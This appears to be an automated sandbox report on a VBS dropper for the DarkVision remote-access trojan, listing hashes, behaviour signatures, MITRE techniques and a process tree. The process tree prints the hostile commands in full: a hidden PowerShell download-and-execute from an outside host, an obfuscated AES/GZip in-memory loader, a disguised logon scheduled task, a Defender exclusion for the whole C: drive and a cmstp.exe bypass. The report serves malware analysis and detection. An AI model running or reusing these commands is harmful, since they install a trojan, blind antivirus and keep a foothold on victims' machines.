darkvision | 13f879d486e63ba54d45f500025f13cb63c83956e0493434a67692f3a47cbace

Analysis

max time kernel
150s
max time network
153s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
03-12-2024 17:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2570_output.vbs
Size

421KB
MD5

1304afcdfc224427dfe647dd10025628
SHA1

54de753563e6a041ca67a90e50c121cd32f2e125
SHA256

13f879d486e63ba54d45f500025f13cb63c83956e0493434a67692f3a47cbace
SHA512

23dcf2384265354d1596934f5d428df2518a410fd074ac6127c9f6b6ac896472542620966ffe6c39a3e74157f3eb3f09e2d481ee265f969861fcc5f3bbac0506
SSDEEP

6144:URCyzWhqzOEHu+s+7e7C8526sSil7tJA1ikRAG9cuyVa8iix6gwXUhkSn:w8hbmbh7uiWct2yVa8ArUhkSn

Score

10^/10

darkvision execution rat

Malware Config

Signatures

DarkVision Rat
DarkVision Rat is a trojan written in C++.
rat darkvision
Darkvision family
darkvision

Blocklisted process makes network request 1 IoCs

flow	pid	Process
8	3908	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3908	powershell.exe
5052	powershell.exe
3156	powershell.exe
1336	powershell.exe
4432	powershell.exe
2780	powershell.exe

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

resource	yara_rule
behavioral2/memory/4116-143-0x00000195B5920000-0x00000195B5976000-memory.dmp	net_reactor

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
3880	server.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4736	timeout.exe
2268	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
4348	taskkill.exe

Suspicious behavior: EnumeratesProcesses 63 IoCs

pid	Process
3908	powershell.exe
3908	powershell.exe
5052	powershell.exe
5052	powershell.exe
3692	powershell.exe
3692	powershell.exe
3156	powershell.exe
3156	powershell.exe
4308	powershell.exe
4308	powershell.exe
1336	powershell.exe
1336	powershell.exe
4116	powershell.exe
4116	powershell.exe
4432	powershell.exe
4432	powershell.exe
1816	powershell.exe
1816	powershell.exe
2780	powershell.exe
2780	powershell.exe
3880	server.exe
3880	server.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2444	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3908	powershell.exe
Token: SeDebugPrivilege	5052	powershell.exe
Token: SeDebugPrivilege	4348	taskkill.exe
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeDebugPrivilege	3156	powershell.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeIncreaseQuotaPrivilege	4308	powershell.exe
Token: SeSecurityPrivilege	4308	powershell.exe
Token: SeTakeOwnershipPrivilege	4308	powershell.exe
Token: SeLoadDriverPrivilege	4308	powershell.exe
Token: SeSystemProfilePrivilege	4308	powershell.exe
Token: SeSystemtimePrivilege	4308	powershell.exe
Token: SeProfSingleProcessPrivilege	4308	powershell.exe
Token: SeIncBasePriorityPrivilege	4308	powershell.exe
Token: SeCreatePagefilePrivilege	4308	powershell.exe
Token: SeBackupPrivilege	4308	powershell.exe
Token: SeRestorePrivilege	4308	powershell.exe
Token: SeShutdownPrivilege	4308	powershell.exe
Token: SeDebugPrivilege	4308	powershell.exe
Token: SeSystemEnvironmentPrivilege	4308	powershell.exe
Token: SeRemoteShutdownPrivilege	4308	powershell.exe
Token: SeUndockPrivilege	4308	powershell.exe
Token: SeManageVolumePrivilege	4308	powershell.exe
Token: 33	4308	powershell.exe
Token: 34	4308	powershell.exe
Token: 35	4308	powershell.exe
Token: 36	4308	powershell.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeIncreaseQuotaPrivilege	1336	powershell.exe
Token: SeSecurityPrivilege	1336	powershell.exe
Token: SeTakeOwnershipPrivilege	1336	powershell.exe
Token: SeLoadDriverPrivilege	1336	powershell.exe
Token: SeSystemProfilePrivilege	1336	powershell.exe
Token: SeSystemtimePrivilege	1336	powershell.exe
Token: SeProfSingleProcessPrivilege	1336	powershell.exe
Token: SeIncBasePriorityPrivilege	1336	powershell.exe
Token: SeCreatePagefilePrivilege	1336	powershell.exe
Token: SeBackupPrivilege	1336	powershell.exe
Token: SeRestorePrivilege	1336	powershell.exe
Token: SeShutdownPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeSystemEnvironmentPrivilege	1336	powershell.exe
Token: SeRemoteShutdownPrivilege	1336	powershell.exe
Token: SeUndockPrivilege	1336	powershell.exe
Token: SeManageVolumePrivilege	1336	powershell.exe
Token: 33	1336	powershell.exe
Token: 34	1336	powershell.exe
Token: 35	1336	powershell.exe
Token: 36	1336	powershell.exe
Token: SeIncreaseQuotaPrivilege	1336	powershell.exe
Token: SeSecurityPrivilege	1336	powershell.exe
Token: SeTakeOwnershipPrivilege	1336	powershell.exe
Token: SeLoadDriverPrivilege	1336	powershell.exe
Token: SeSystemProfilePrivilege	1336	powershell.exe
Token: SeSystemtimePrivilege	1336	powershell.exe
Token: SeProfSingleProcessPrivilege	1336	powershell.exe
Token: SeIncBasePriorityPrivilege	1336	powershell.exe
Token: SeCreatePagefilePrivilege	1336	powershell.exe
Token: SeBackupPrivilege	1336	powershell.exe
Token: SeRestorePrivilege	1336	powershell.exe
Token: SeShutdownPrivilege	1336	powershell.exe
Token: SeDebugPrivilege	1336	powershell.exe
Token: SeSystemEnvironmentPrivilege	1336	powershell.exe
Token: SeRemoteShutdownPrivilege	1336	powershell.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe

Suspicious use of SendNotifyMessage 34 IoCs

pid	Process
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe
2444	taskmgr.exe

Suspicious use of WriteProcessMemory 42 IoCs

description	pid	Process	procid_target
PID 2384 wrote to memory of 3908	2384	WScript.exe	83
PID 2384 wrote to memory of 3908	2384	WScript.exe	83
PID 3908 wrote to memory of 1936	3908	powershell.exe	86
PID 3908 wrote to memory of 1936	3908	powershell.exe	86
PID 1936 wrote to memory of 3080	1936	csc.exe	87
PID 1936 wrote to memory of 3080	1936	csc.exe	87
PID 3908 wrote to memory of 4964	3908	powershell.exe	88
PID 3908 wrote to memory of 4964	3908	powershell.exe	88
PID 2384 wrote to memory of 4220	2384	WScript.exe	113
PID 2384 wrote to memory of 4220	2384	WScript.exe	113
PID 4220 wrote to memory of 4212	4220	cmd.exe	115
PID 4220 wrote to memory of 4212	4220	cmd.exe	115
PID 4212 wrote to memory of 4720	4212	cmd.exe	117
PID 4212 wrote to memory of 4720	4212	cmd.exe	117
PID 4212 wrote to memory of 3692	4212	cmd.exe	118
PID 4212 wrote to memory of 3692	4212	cmd.exe	118
PID 3692 wrote to memory of 3156	3692	powershell.exe	119
PID 3692 wrote to memory of 3156	3692	powershell.exe	119
PID 3692 wrote to memory of 4308	3692	powershell.exe	120
PID 3692 wrote to memory of 4308	3692	powershell.exe	120
PID 3692 wrote to memory of 1336	3692	powershell.exe	123
PID 3692 wrote to memory of 1336	3692	powershell.exe	123
PID 3692 wrote to memory of 4700	3692	powershell.exe	125
PID 3692 wrote to memory of 4700	3692	powershell.exe	125
PID 4700 wrote to memory of 4280	4700	cmd.exe	127
PID 4700 wrote to memory of 4280	4700	cmd.exe	127
PID 4280 wrote to memory of 4888	4280	cmd.exe	129
PID 4280 wrote to memory of 4888	4280	cmd.exe	129
PID 4280 wrote to memory of 4116	4280	cmd.exe	130
PID 4280 wrote to memory of 4116	4280	cmd.exe	130
PID 4116 wrote to memory of 4432	4116	powershell.exe	131
PID 4116 wrote to memory of 4432	4116	powershell.exe	131
PID 4212 wrote to memory of 4736	4212	cmd.exe	132
PID 4212 wrote to memory of 4736	4212	cmd.exe	132
PID 4116 wrote to memory of 1816	4116	powershell.exe	133
PID 4116 wrote to memory of 1816	4116	powershell.exe	133
PID 4116 wrote to memory of 2780	4116	powershell.exe	135
PID 4116 wrote to memory of 2780	4116	powershell.exe	135
PID 4116 wrote to memory of 3880	4116	powershell.exe	137
PID 4116 wrote to memory of 3880	4116	powershell.exe	137
PID 4280 wrote to memory of 2268	4280	cmd.exe	138
PID 4280 wrote to memory of 2268	4280	cmd.exe	138

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\2570_output.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3908
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pfuz2ljq\pfuz2ljq.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFED2.tmp" "c:\Users\Admin\AppData\Local\Temp\pfuz2ljq\CSC9FCB6DB7B31043A58769A83D984227A3.TMP"
      4⤵
      PID:3080
- - C:\windows\system32\cmstp.exe
    "C:\windows\system32\cmstp.exe" /au C:\windows\temp\oo0ksopp.inf
    3⤵
    PID:4964
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\n1.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\n1.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4212
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\n1.bat';$qITC='LouFPXaduFPX'.Replace('uFPX', ''),'TUSuyraUSuynsUSuyfoUSuyrUSuymFUSuyinUSuyalUSuyBlUSuyockUSuy'.Replace('USuy', ''),'CrzEmWezEmWatezEmWDeczEmWryzEmWpzEmWtozEmWrzEmW'.Replace('zEmW', ''),'InTXcnvTXcnokeTXcn'.Replace('TXcn', ''),'ChavMYCngvMYCeEvMYCxtevMYCnvMYCsvMYCionvMYC'.Replace('vMYC', ''),'FroTZlrmTZlrBaTZlrsTZlre64TZlrStTZlrriTZlrngTZlr'.Replace('TZlr', ''),'CoMOrVpMOrVyTMOrVoMOrV'.Replace('MOrV', ''),'ReahjxadahjxLahjxiahjxneahjxsahjx'.Replace('ahjx', ''),'EoUWdnoUWdtroUWdyoUWdPooUWdioUWdntoUWd'.Replace('oUWd', ''),'EqSJhlemqSJhentqSJhAtqSJh'.Replace('qSJh', ''),'SuRkbpuRkbluRkbiuRkbtuRkb'.Replace('uRkb', ''),'GCJOUetCCJOUurCJOUrCJOUenCJOUtPrCJOUoCJOUceCJOUssCJOU'.Replace('CJOU', ''),'DeajkMcajkMoajkMmprajkMeajkMsajkMsajkM'.Replace('ajkM', ''),'MaasMVinasMVMoasMVduasMVleasMV'.Replace('asMV', '');powershell -w hidden;function gUZuM($CFHEm){$VtKjY=[System.Security.Cryptography.Aes]::Create();$VtKjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VtKjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VtKjY.Key=[System.Convert]::($qITC[5])('gEhsJeRdRC5Ki9l14TCSSipF/1hE8pGPMmODwPyopiw=');$VtKjY.IV=[System.Convert]::($qITC[5])('k4acgMLLeJA4HUn289xcAw==');$pKWcz=$VtKjY.($qITC[2])();$RhEHp=$pKWcz.($qITC[1])($CFHEm,0,$CFHEm.Length);$pKWcz.Dispose();$VtKjY.Dispose();$RhEHp;}function xBAEi($CFHEm){$EdEdU=New-Object System.IO.MemoryStream(,$CFHEm);$pWSoO=New-Object System.IO.MemoryStream;$mpgHU=New-Object System.IO.Compression.GZipStream($EdEdU,[IO.Compression.CompressionMode]::($qITC[12]));$mpgHU.($qITC[6])($pWSoO);$mpgHU.Dispose();$EdEdU.Dispose();$pWSoO.Dispose();$pWSoO.ToArray();}$tlpZd=[System.IO.File]::($qITC[7])([Console]::Title);$sQzRR=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 5).Substring(2))));$OzOEx=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 6).Substring(2))));[System.Reflection.Assembly]::($qITC[0])([byte[]]$OzOEx).($qITC[8]).($qITC[3])($null,$null);[System.Reflection.Assembly]::($qITC[0])([byte[]]$sQzRR).($qITC[8]).($qITC[3])($null,$null); "
      4⤵
      PID:4720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3692
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3156
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\n1')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4308
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 68537' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network68537Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1336
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network68537Man.cmd"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4700
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network68537Man.cmd"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4280
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network68537Man.cmd';$qITC='LouFPXaduFPX'.Replace('uFPX', ''),'TUSuyraUSuynsUSuyfoUSuyrUSuymFUSuyinUSuyalUSuyBlUSuyockUSuy'.Replace('USuy', ''),'CrzEmWezEmWatezEmWDeczEmWryzEmWpzEmWtozEmWrzEmW'.Replace('zEmW', ''),'InTXcnvTXcnokeTXcn'.Replace('TXcn', ''),'ChavMYCngvMYCeEvMYCxtevMYCnvMYCsvMYCionvMYC'.Replace('vMYC', ''),'FroTZlrmTZlrBaTZlrsTZlre64TZlrStTZlrriTZlrngTZlr'.Replace('TZlr', ''),'CoMOrVpMOrVyTMOrVoMOrV'.Replace('MOrV', ''),'ReahjxadahjxLahjxiahjxneahjxsahjx'.Replace('ahjx', ''),'EoUWdnoUWdtroUWdyoUWdPooUWdioUWdntoUWd'.Replace('oUWd', ''),'EqSJhlemqSJhentqSJhAtqSJh'.Replace('qSJh', ''),'SuRkbpuRkbluRkbiuRkbtuRkb'.Replace('uRkb', ''),'GCJOUetCCJOUurCJOUrCJOUenCJOUtPrCJOUoCJOUceCJOUssCJOU'.Replace('CJOU', ''),'DeajkMcajkMoajkMmprajkMeajkMsajkMsajkM'.Replace('ajkM', ''),'MaasMVinasMVMoasMVduasMVleasMV'.Replace('asMV', '');powershell -w hidden;function gUZuM($CFHEm){$VtKjY=[System.Security.Cryptography.Aes]::Create();$VtKjY.Mode=[System.Security.Cryptography.CipherMode]::CBC;$VtKjY.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$VtKjY.Key=[System.Convert]::($qITC[5])('gEhsJeRdRC5Ki9l14TCSSipF/1hE8pGPMmODwPyopiw=');$VtKjY.IV=[System.Convert]::($qITC[5])('k4acgMLLeJA4HUn289xcAw==');$pKWcz=$VtKjY.($qITC[2])();$RhEHp=$pKWcz.($qITC[1])($CFHEm,0,$CFHEm.Length);$pKWcz.Dispose();$VtKjY.Dispose();$RhEHp;}function xBAEi($CFHEm){$EdEdU=New-Object System.IO.MemoryStream(,$CFHEm);$pWSoO=New-Object System.IO.MemoryStream;$mpgHU=New-Object System.IO.Compression.GZipStream($EdEdU,[IO.Compression.CompressionMode]::($qITC[12]));$mpgHU.($qITC[6])($pWSoO);$mpgHU.Dispose();$EdEdU.Dispose();$pWSoO.Dispose();$pWSoO.ToArray();}$tlpZd=[System.IO.File]::($qITC[7])([Console]::Title);$sQzRR=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 5).Substring(2))));$OzOEx=xBAEi (gUZuM ([Convert]::($qITC[5])([System.Linq.Enumerable]::($qITC[9])($tlpZd, 6).Substring(2))));[System.Reflection.Assembly]::($qITC[0])([byte[]]$OzOEx).($qITC[8]).($qITC[3])($null,$null);[System.Reflection.Assembly]::($qITC[0])([byte[]]$sQzRR).($qITC[8]).($qITC[3])($null,$null); "
        7⤵
        
        PID:4888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        7⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:4116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network68537Man')
        8⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1816
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 68537' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network68537Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2780
        
        C:\ProgramData\Server\server.exe
        
        "C:\ProgramData\Server\server.exe" {BBD4D601-E96C-4865-9F7D-5ED63C15EBAF}
        8⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3880
        
        C:\Windows\system32\timeout.exe
        
        timeout /nobreak /t 1
        7⤵
        Delays execution with timeout.exe
        
        PID:2268
  - - C:\Windows\system32\timeout.exe
      timeout /nobreak /t 1
      4⤵
      Delays execution with timeout.exe
      PID:4736

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5052

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4348

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3160

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2444

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Server\server.exe

Filesize
442KB

MD5
04029e121a0cfa5991749937dd22a1d9

SHA1
f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

SHA256
9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

SHA512
6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
071702387122f10b24628acb7d31a011

SHA1
86762b376985bf67e733d1486eadfef184a8079c

SHA256
ab8016d4722636ff84a9899af8e2fdd89622e7e6a067d9f7ea34e7d079c658f6

SHA512
5bc866e1b410b07a8d738fed8824f4cba1ab2e774c1b73a592210d34e9cfb1b6297eb76a93e578d86d10ee3eb7a7c879899ecd947a27e836bbe0828c754771bd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
e4de99c1795fd54aa87da05fa39c199c

SHA1
dfaaac2de1490fae01104f0a6853a9d8fe39a9d7

SHA256
23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457

SHA512
796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a222f9cb79a407bb66a5e3a36686a5c1

SHA1
92fa793709df14a5b95d8a37671a3b6ccc7495c7

SHA256
3123124c814e6f4bffac7674d778b2f0d2311967654e462a584b7237f2277722

SHA512
733b4fcd27170aed47e3e4e1c044f02cd7829c7f9d2e9b63c37bdfc429a656f9dddc0c5a62dd56296171154d0207dba512b92ce8a65e82ec005075f306712820

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9d662ecae338ca923a784422a86e9925

SHA1
ccdbbd6f3a1801b13f503d92f5d48fe5041ab495

SHA256
af4b4d21aa532d4ca4638e2d3c9a07760dfeb65fbe782319860130ba09b62d6e

SHA512
5455380e241bd3f697a8697cac7bcce54a1dc323d33995067407bc92858bc2d2216f092cce674a87f3b2d9f34b61bb5b7b13c1b57d511f1540123d38cc7bf38e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d358c67dab4e3ba324e2ac3ba02dc474

SHA1
a35be6c1fa04486f0fd4ac8be0cb994893d0f275

SHA256
11ce6adc01c36028722c249455e404e8a2aa2dc66ea5f0e6c4ab842774263997

SHA512
d413f802232fe61a59c5bfe16ac42aa5fec26eab693894f709f696e233c7115a6678356e66995eb46f0d08e468fd9a2deed6d0a07d1b7f571cf078f55861f288

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bf0eda50972f08c8b9d8c9cb5ce7d0c2

SHA1
2d8fb14d729b8afe30b4dd3d83d9dfa50afd5dab

SHA256
58507df56c947895b91930c001aa1e917c7bd33cf813ec203487735195c545e1

SHA512
